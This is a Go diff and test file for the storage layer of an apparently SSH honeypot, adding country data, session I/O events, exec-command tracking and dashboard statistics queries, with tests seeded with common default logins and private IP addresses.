sessions, err := store.GetRecentSessions(ctx, 10, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].EventCount != 2 {
|
||||||
|
t.Errorf("EventCount = %d, want 2", sessions[0].EventCount)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func TestNewSQLiteStoreCreatesFile(t *testing.T) {
|
func TestNewSQLiteStoreCreatesFile(t *testing.T) {
|
||||||
dbPath := filepath.Join(t.TempDir(), "subdir", "test.db")
|
dbPath := filepath.Join(t.TempDir(), "test.db")
|
||||||
// Parent directory doesn't exist yet; SQLite should create it.
|
|
||||||
// Actually, SQLite doesn't create parent dirs, but the file itself.
|
|
||||||
// Use a path in the temp dir directly.
|
|
||||||
dbPath = filepath.Join(t.TempDir(), "test.db")
|
|
||||||
store, err := NewSQLiteStore(dbPath)
|
store, err := NewSQLiteStore(dbPath)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
t.Fatalf("creating store: %v", err)
|
t.Fatalf("creating store: %v", err)
|
||||||
@@ -218,7 +287,7 @@ func TestNewSQLiteStoreCreatesFile(t *testing.T) {
|
|||||||
|
|
||||||
// Verify we can use the store.
|
// Verify we can use the store.
|
||||||
ctx := context.Background()
|
ctx := context.Background()
|
||||||
if err := store.RecordLoginAttempt(ctx, "test", "test", "127.0.0.1"); err != nil {
|
if err := store.RecordLoginAttempt(ctx, "test", "test", "127.0.0.1", ""); err != nil {
|
||||||
t.Fatalf("recording attempt: %v", err)
|
t.Fatalf("recording attempt: %v", err)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ type LoginAttempt struct {
|
|||||||
Username string
|
Username string
|
||||||
Password string
|
Password string
|
||||||
IP string
|
IP string
|
||||||
|
Country string
|
||||||
Count int
|
Count int
|
||||||
FirstSeen time.Time
|
FirstSeen time.Time
|
||||||
LastSeen time.Time
|
LastSeen time.Time
|
||||||
@@ -20,11 +21,15 @@ type LoginAttempt struct {
|
|||||||
type Session struct {
|
type Session struct {
|
||||||
ID string
|
ID string
|
||||||
IP string
|
IP string
|
||||||
|
Country string
|
||||||
Username string
|
Username string
|
||||||
ShellName string
|
ShellName string
|
||||||
ConnectedAt time.Time
|
ConnectedAt time.Time
|
||||||
DisconnectedAt *time.Time
|
DisconnectedAt *time.Time
|
||||||
HumanScore *float64
|
HumanScore *float64
|
||||||
|
ExecCommand *string
|
||||||
|
EventCount int
|
||||||
|
InputBytes int64
|
||||||
}
|
}
|
||||||
|
|
||||||
// SessionLog represents a single log entry for a session.
|
// SessionLog represents a single log entry for a session.
|
||||||
@@ -36,14 +41,66 @@ type SessionLog struct {
|
|||||||
Output string
|
Output string
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// SessionEvent represents a single I/O event recorded during a session.
|
||||||
|
type SessionEvent struct {
|
||||||
|
SessionID string
|
||||||
|
Timestamp time.Time
|
||||||
|
Direction int // 0=input (client→server), 1=output (server→client)
|
||||||
|
Data []byte
|
||||||
|
}
|
||||||
|
|
||||||
|
// DashboardStats holds aggregate counts for the web dashboard.
|
||||||
|
type DashboardStats struct {
|
||||||
|
TotalAttempts int64
|
||||||
|
UniqueIPs int64
|
||||||
|
TotalSessions int64
|
||||||
|
ActiveSessions int64
|
||||||
|
}
|
||||||
|
|
||||||
|
// TimeSeriesPoint represents a single data point in a time series.
|
||||||
|
type TimeSeriesPoint struct {
|
||||||
|
Timestamp time.Time
|
||||||
|
Count int64
|
||||||
|
}
|
||||||
|
|
||||||
|
// HourlyCount represents the total attempts for a given hour of day.
|
||||||
|
type HourlyCount struct {
|
||||||
|
Hour int // 0-23
|
||||||
|
Count int64
|
||||||
|
}
|
||||||
|
|
||||||
|
// CountryCount represents the total attempts from a given country.
|
||||||
|
type CountryCount struct {
|
||||||
|
Country string
|
||||||
|
Count int64
|
||||||
|
}
|
||||||
|
|
||||||
|
// DashboardFilter contains optional filters for dashboard queries.
|
||||||
|
type DashboardFilter struct {
|
||||||
|
Since *time.Time
|
||||||
|
Until *time.Time
|
||||||
|
IP string
|
||||||
|
Country string
|
||||||
|
Username string
|
||||||
|
HumanScoreAboveZero bool
|
||||||
|
SortBy string
|
||||||
|
}
|
||||||
|
|
||||||
|
// TopEntry represents a value and its count for top-N queries.
|
||||||
|
type TopEntry struct {
|
||||||
|
Value string
|
||||||
|
Country string // populated by GetTopIPs
|
||||||
|
Count int64
|
||||||
|
}
|
||||||
|
|
||||||
// Store is the interface for persistent storage of honeypot data.
|
// Store is the interface for persistent storage of honeypot data.
|
||||||
type Store interface {
|
type Store interface {
|
||||||
// RecordLoginAttempt upserts a login attempt, incrementing the count
|
// RecordLoginAttempt upserts a login attempt, incrementing the count
|
||||||
// for existing (username, password, ip) combinations.
|
// for existing (username, password, ip) combinations.
|
||||||
RecordLoginAttempt(ctx context.Context, username, password, ip string) error
|
RecordLoginAttempt(ctx context.Context, username, password, ip, country string) error
|
||||||
|
|
||||||
// CreateSession creates a new session record and returns its UUID.
|
// CreateSession creates a new session record and returns its UUID.
|
||||||
CreateSession(ctx context.Context, ip, username, shellName string) (string, error)
|
CreateSession(ctx context.Context, ip, username, shellName, country string) (string, error)
|
||||||
|
|
||||||
// EndSession sets the disconnected_at timestamp for a session.
|
// EndSession sets the disconnected_at timestamp for a session.
|
||||||
EndSession(ctx context.Context, sessionID string, disconnectedAt time.Time) error
|
EndSession(ctx context.Context, sessionID string, disconnectedAt time.Time) error
|
||||||
@@ -51,6 +108,9 @@ type Store interface {
|
|||||||
// UpdateHumanScore sets the human detection score for a session.
|
// UpdateHumanScore sets the human detection score for a session.
|
||||||
UpdateHumanScore(ctx context.Context, sessionID string, score float64) error
|
UpdateHumanScore(ctx context.Context, sessionID string, score float64) error
|
||||||
|
|
||||||
|
// SetExecCommand sets the exec command for a session.
|
||||||
|
SetExecCommand(ctx context.Context, sessionID string, command string) error
|
||||||
|
|
||||||
// AppendSessionLog adds a log entry to a session.
|
// AppendSessionLog adds a log entry to a session.
|
||||||
AppendSessionLog(ctx context.Context, sessionID, input, output string) error
|
AppendSessionLog(ctx context.Context, sessionID, input, output string) error
|
||||||
|
|
||||||
@@ -58,6 +118,73 @@ type Store interface {
|
|||||||
// and returns the total number of deleted rows.
|
// and returns the total number of deleted rows.
|
||||||
DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error)
|
DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error)
|
||||||
|
|
||||||
|
// GetDashboardStats returns aggregate counts for the dashboard.
|
||||||
|
GetDashboardStats(ctx context.Context) (*DashboardStats, error)
|
||||||
|
|
||||||
|
// GetTopUsernames returns the top N usernames by total attempt count.
|
||||||
|
GetTopUsernames(ctx context.Context, limit int) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetTopPasswords returns the top N passwords by total attempt count.
|
||||||
|
GetTopPasswords(ctx context.Context, limit int) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetTopIPs returns the top N IPs by total attempt count.
|
||||||
|
GetTopIPs(ctx context.Context, limit int) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetTopCountries returns the top N countries by total attempt count.
|
||||||
|
GetTopCountries(ctx context.Context, limit int) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetTopExecCommands returns the top N exec commands by session count.
|
||||||
|
GetTopExecCommands(ctx context.Context, limit int) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetRecentSessions returns the most recent sessions ordered by connected_at DESC.
|
||||||
|
// If activeOnly is true, only sessions with no disconnected_at are returned.
|
||||||
|
GetRecentSessions(ctx context.Context, limit int, activeOnly bool) ([]Session, error)
|
||||||
|
|
||||||
|
// GetFilteredSessions returns sessions matching the given filter, ordered
|
||||||
|
// by the filter's SortBy field (default: connected_at DESC).
|
||||||
|
GetFilteredSessions(ctx context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error)
|
||||||
|
|
||||||
|
// GetSession returns a single session by ID.
|
||||||
|
GetSession(ctx context.Context, sessionID string) (*Session, error)
|
||||||
|
|
||||||
|
// GetSessionLogs returns all log entries for a session ordered by timestamp.
|
||||||
|
GetSessionLogs(ctx context.Context, sessionID string) ([]SessionLog, error)
|
||||||
|
|
||||||
|
// AppendSessionEvents batch-inserts session events.
|
||||||
|
AppendSessionEvents(ctx context.Context, events []SessionEvent) error
|
||||||
|
|
||||||
|
// GetSessionEvents returns all events for a session ordered by id.
|
||||||
|
GetSessionEvents(ctx context.Context, sessionID string) ([]SessionEvent, error)
|
||||||
|
|
||||||
|
// CloseActiveSessions sets disconnected_at for all sessions that are
|
||||||
|
// still marked as active. This should be called at startup to clean up
|
||||||
|
// sessions left over from a previous unclean shutdown.
|
||||||
|
CloseActiveSessions(ctx context.Context, disconnectedAt time.Time) (int64, error)
|
||||||
|
|
||||||
|
// GetAttemptsOverTime returns daily attempt counts for the last N days.
|
||||||
|
GetAttemptsOverTime(ctx context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error)
|
||||||
|
|
||||||
|
// GetHourlyPattern returns total attempts grouped by hour of day (0-23).
|
||||||
|
GetHourlyPattern(ctx context.Context, since, until *time.Time) ([]HourlyCount, error)
|
||||||
|
|
||||||
|
// GetCountryStats returns total attempts per country, ordered by count DESC.
|
||||||
|
GetCountryStats(ctx context.Context) ([]CountryCount, error)
|
||||||
|
|
||||||
|
// GetFilteredDashboardStats returns aggregate counts with optional filters applied.
|
||||||
|
GetFilteredDashboardStats(ctx context.Context, f DashboardFilter) (*DashboardStats, error)
|
||||||
|
|
||||||
|
// GetFilteredTopUsernames returns top usernames with optional filters applied.
|
||||||
|
GetFilteredTopUsernames(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetFilteredTopPasswords returns top passwords with optional filters applied.
|
||||||
|
GetFilteredTopPasswords(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetFilteredTopIPs returns top IPs with optional filters applied.
|
||||||
|
GetFilteredTopIPs(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
|
||||||
|
|
||||||
|
// GetFilteredTopCountries returns top countries with optional filters applied.
|
||||||
|
GetFilteredTopCountries(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error)
|
||||||
|
|
||||||
// Close releases any resources held by the store.
|
// Close releases any resources held by the store.
|
||||||
Close() error
|
Close() error
|
||||||
}
|
}
|
||||||
|
|||||||
891
internal/storage/store_test.go
Normal file
891
internal/storage/store_test.go
Normal file
@@ -0,0 +1,891 @@
|
|||||||
|
package storage
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"path/filepath"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// storeFactory returns a clean Store and a cleanup function.
|
||||||
|
type storeFactory func(t *testing.T) Store
|
||||||
|
|
||||||
|
func testStores(t *testing.T, f func(t *testing.T, newStore storeFactory)) {
|
||||||
|
t.Helper()
|
||||||
|
t.Run("SQLite", func(t *testing.T) {
|
||||||
|
f(t, func(t *testing.T) Store {
|
||||||
|
t.Helper()
|
||||||
|
dbPath := filepath.Join(t.TempDir(), "test.db")
|
||||||
|
s, err := NewSQLiteStore(dbPath)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("creating SQLiteStore: %v", err)
|
||||||
|
}
|
||||||
|
t.Cleanup(func() { _ = s.Close() })
|
||||||
|
return s
|
||||||
|
})
|
||||||
|
})
|
||||||
|
t.Run("Memory", func(t *testing.T) {
|
||||||
|
f(t, func(t *testing.T) Store {
|
||||||
|
t.Helper()
|
||||||
|
return NewMemoryStore()
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func seedData(t *testing.T, store Store) {
|
||||||
|
t.Helper()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Login attempts: root/toor from two IPs, admin/admin from one IP.
|
||||||
|
for range 5 {
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", ""); err != nil {
|
||||||
|
t.Fatalf("seeding attempt: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
for range 3 {
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.2", ""); err != nil {
|
||||||
|
t.Fatalf("seeding attempt: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
for range 2 {
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "admin", "admin", "10.0.0.1", ""); err != nil {
|
||||||
|
t.Fatalf("seeding attempt: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Sessions: one active, one ended.
|
||||||
|
id1, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("creating session: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.EndSession(ctx, id1, time.Now()); err != nil {
|
||||||
|
t.Fatalf("ending session: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
if _, err := store.CreateSession(ctx, "10.0.0.2", "admin", "bash", ""); err != nil {
|
||||||
|
t.Fatalf("creating session: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetDashboardStats(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
stats, err := store.GetDashboardStats(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetDashboardStats: %v", err)
|
||||||
|
}
|
||||||
|
if stats.TotalAttempts != 0 || stats.UniqueIPs != 0 || stats.TotalSessions != 0 || stats.ActiveSessions != 0 {
|
||||||
|
t.Errorf("expected all zeros, got %+v", stats)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("with data", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
stats, err := store.GetDashboardStats(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetDashboardStats: %v", err)
|
||||||
|
}
|
||||||
|
// 5 + 3 + 2 = 10 total attempts
|
||||||
|
if stats.TotalAttempts != 10 {
|
||||||
|
t.Errorf("TotalAttempts = %d, want 10", stats.TotalAttempts)
|
||||||
|
}
|
||||||
|
// 2 unique IPs: 10.0.0.1 and 10.0.0.2
|
||||||
|
if stats.UniqueIPs != 2 {
|
||||||
|
t.Errorf("UniqueIPs = %d, want 2", stats.UniqueIPs)
|
||||||
|
}
|
||||||
|
if stats.TotalSessions != 2 {
|
||||||
|
t.Errorf("TotalSessions = %d, want 2", stats.TotalSessions)
|
||||||
|
}
|
||||||
|
if stats.ActiveSessions != 1 {
|
||||||
|
t.Errorf("ActiveSessions = %d, want 1", stats.ActiveSessions)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetTopUsernames(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
entries, err := store.GetTopUsernames(context.Background(), 10)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetTopUsernames: %v", err)
|
||||||
|
}
|
||||||
|
if len(entries) != 0 {
|
||||||
|
t.Errorf("expected empty, got %v", entries)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("with data", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
|
||||||
|
entries, err := store.GetTopUsernames(context.Background(), 10)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetTopUsernames: %v", err)
|
||||||
|
}
|
||||||
|
if len(entries) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(entries))
|
||||||
|
}
|
||||||
|
// root: 5 + 3 = 8, admin: 2
|
||||||
|
if entries[0].Value != "root" || entries[0].Count != 8 {
|
||||||
|
t.Errorf("entries[0] = %+v, want root/8", entries[0])
|
||||||
|
}
|
||||||
|
if entries[1].Value != "admin" || entries[1].Count != 2 {
|
||||||
|
t.Errorf("entries[1] = %+v, want admin/2", entries[1])
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("limit", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
|
||||||
|
entries, err := store.GetTopUsernames(context.Background(), 1)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetTopUsernames: %v", err)
|
||||||
|
}
|
||||||
|
if len(entries) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(entries))
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetTopPasswords(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
|
||||||
|
entries, err := store.GetTopPasswords(context.Background(), 10)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetTopPasswords: %v", err)
|
||||||
|
}
|
||||||
|
if len(entries) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(entries))
|
||||||
|
}
|
||||||
|
// toor: 8, admin: 2
|
||||||
|
if entries[0].Value != "toor" || entries[0].Count != 8 {
|
||||||
|
t.Errorf("entries[0] = %+v, want toor/8", entries[0])
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetTopIPs(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
store := newStore(t)
|
||||||
|
seedData(t, store)
|
||||||
|
|
||||||
|
entries, err := store.GetTopIPs(context.Background(), 10)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetTopIPs: %v", err)
|
||||||
|
}
|
||||||
|
if len(entries) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(entries))
|
||||||
|
}
|
||||||
|
// 10.0.0.1: 5 + 2 = 7, 10.0.0.2: 3
|
||||||
|
if entries[0].Value != "10.0.0.1" || entries[0].Count != 7 {
|
||||||
|
t.Errorf("entries[0] = %+v, want 10.0.0.1/7", entries[0])
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetSession(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("not found", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
s, err := store.GetSession(context.Background(), "nonexistent")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSession: %v", err)
|
||||||
|
}
|
||||||
|
if s != nil {
|
||||||
|
t.Errorf("expected nil, got %+v", s)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("found", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
s, err := store.GetSession(ctx, id)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSession: %v", err)
|
||||||
|
}
|
||||||
|
if s == nil {
|
||||||
|
t.Fatal("expected session, got nil")
|
||||||
|
}
|
||||||
|
if s.ID != id || s.IP != "10.0.0.1" || s.Username != "root" || s.ShellName != "bash" {
|
||||||
|
t.Errorf("unexpected session: %+v", s)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetSessionLogs(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.AppendSessionLog(ctx, id, "ls", "file1\nfile2"); err != nil {
|
||||||
|
t.Fatalf("AppendSessionLog: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.AppendSessionLog(ctx, id, "pwd", "/home/root"); err != nil {
|
||||||
|
t.Fatalf("AppendSessionLog: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
logs, err := store.GetSessionLogs(ctx, id)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSessionLogs: %v", err)
|
||||||
|
}
|
||||||
|
if len(logs) != 2 {
|
||||||
|
t.Fatalf("len = %d, want 2", len(logs))
|
||||||
|
}
|
||||||
|
if logs[0].Input != "ls" {
|
||||||
|
t.Errorf("logs[0].Input = %q, want %q", logs[0].Input, "ls")
|
||||||
|
}
|
||||||
|
if logs[1].Input != "pwd" {
|
||||||
|
t.Errorf("logs[1].Input = %q, want %q", logs[1].Input, "pwd")
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSessionEvents(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
events, err := store.GetSessionEvents(context.Background(), "nonexistent")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
if len(events) != 0 {
|
||||||
|
t.Errorf("expected empty, got %d", len(events))
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("append and retrieve", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
now := time.Now().UTC()
|
||||||
|
events := []SessionEvent{
|
||||||
|
{SessionID: id, Timestamp: now, Direction: 0, Data: []byte("ls\n")},
|
||||||
|
{SessionID: id, Timestamp: now.Add(100 * time.Millisecond), Direction: 1, Data: []byte("file1\nfile2\n")},
|
||||||
|
{SessionID: id, Timestamp: now.Add(200 * time.Millisecond), Direction: 0, Data: []byte("pwd\n")},
|
||||||
|
}
|
||||||
|
if err := store.AppendSessionEvents(ctx, events); err != nil {
|
||||||
|
t.Fatalf("AppendSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
got, err := store.GetSessionEvents(ctx, id)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSessionEvents: %v", err)
|
||||||
|
}
|
||||||
|
if len(got) != 3 {
|
||||||
|
t.Fatalf("len = %d, want 3", len(got))
|
||||||
|
}
|
||||||
|
if got[0].Direction != 0 || string(got[0].Data) != "ls\n" {
|
||||||
|
t.Errorf("got[0] = %+v", got[0])
|
||||||
|
}
|
||||||
|
if got[1].Direction != 1 || string(got[1].Data) != "file1\nfile2\n" {
|
||||||
|
t.Errorf("got[1] = %+v", got[1])
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("append empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
if err := store.AppendSessionEvents(context.Background(), nil); err != nil {
|
||||||
|
t.Fatalf("AppendSessionEvents(nil): %v", err)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCloseActiveSessions(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("no active sessions", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
n, err := store.CloseActiveSessions(ctx, time.Now())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CloseActiveSessions: %v", err)
|
||||||
|
}
|
||||||
|
if n != 0 {
|
||||||
|
t.Errorf("closed %d, want 0", n)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("closes only active sessions", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Create 3 sessions: end one, leave two active.
|
||||||
|
id1, _ := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
store.CreateSession(ctx, "10.0.0.2", "admin", "bash", "")
|
||||||
|
store.CreateSession(ctx, "10.0.0.3", "test", "bash", "")
|
||||||
|
store.EndSession(ctx, id1, time.Now())
|
||||||
|
|
||||||
|
n, err := store.CloseActiveSessions(ctx, time.Now())
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CloseActiveSessions: %v", err)
|
||||||
|
}
|
||||||
|
if n != 2 {
|
||||||
|
t.Errorf("closed %d, want 2", n)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify no active sessions remain.
|
||||||
|
active, err := store.GetRecentSessions(ctx, 10, true)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(active) != 0 {
|
||||||
|
t.Errorf("active sessions = %d, want 0", len(active))
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSetExecCommand(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("set and retrieve", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Initially nil.
|
||||||
|
s, err := store.GetSession(ctx, id)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSession: %v", err)
|
||||||
|
}
|
||||||
|
if s.ExecCommand != nil {
|
||||||
|
t.Errorf("expected nil ExecCommand, got %q", *s.ExecCommand)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set exec command.
|
||||||
|
if err := store.SetExecCommand(ctx, id, "uname -a"); err != nil {
|
||||||
|
t.Fatalf("SetExecCommand: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
s, err = store.GetSession(ctx, id)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetSession: %v", err)
|
||||||
|
}
|
||||||
|
if s.ExecCommand == nil {
|
||||||
|
t.Fatal("expected non-nil ExecCommand")
|
||||||
|
}
|
||||||
|
if *s.ExecCommand != "uname -a" {
|
||||||
|
t.Errorf("ExecCommand = %q, want %q", *s.ExecCommand, "uname -a")
|
||||||
|
}
|
||||||
|
})
|
||||||
|
|
||||||
|
t.Run("appears in recent sessions", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
id, err := store.CreateSession(ctx, "10.0.0.1", "root", "bash", "")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
if err := store.SetExecCommand(ctx, id, "id"); err != nil {
|
||||||
|
t.Fatalf("SetExecCommand: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
sessions, err := store.GetRecentSessions(ctx, 10, false)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetRecentSessions: %v", err)
|
||||||
|
}
|
||||||
|
if len(sessions) != 1 {
|
||||||
|
t.Fatalf("len = %d, want 1", len(sessions))
|
||||||
|
}
|
||||||
|
if sessions[0].ExecCommand == nil || *sessions[0].ExecCommand != "id" {
|
||||||
|
t.Errorf("ExecCommand = %v, want \"id\"", sessions[0].ExecCommand)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func seedChartData(t *testing.T, store Store) {
|
||||||
|
t.Helper()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Record attempts with country data from different IPs.
|
||||||
|
for range 5 {
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "root", "toor", "10.0.0.1", "CN"); err != nil {
|
||||||
|
t.Fatalf("seeding attempt: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
for range 3 {
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "admin", "admin", "10.0.0.2", "RU"); err != nil {
|
||||||
|
t.Fatalf("seeding attempt: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
for range 2 {
|
||||||
|
if err := store.RecordLoginAttempt(ctx, "root", "123456", "10.0.0.3", "CN"); err != nil {
|
||||||
|
t.Fatalf("seeding attempt: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestGetAttemptsOverTime(t *testing.T) {
|
||||||
|
testStores(t, func(t *testing.T, newStore storeFactory) {
|
||||||
|
t.Run("empty", func(t *testing.T) {
|
||||||
|
store := newStore(t)
|
||||||
|
points, err := store.GetAttemptsOverTime(context.Background(), 30, nil, nil)
|
||||||
|
if err != nil {
|
||||||
|
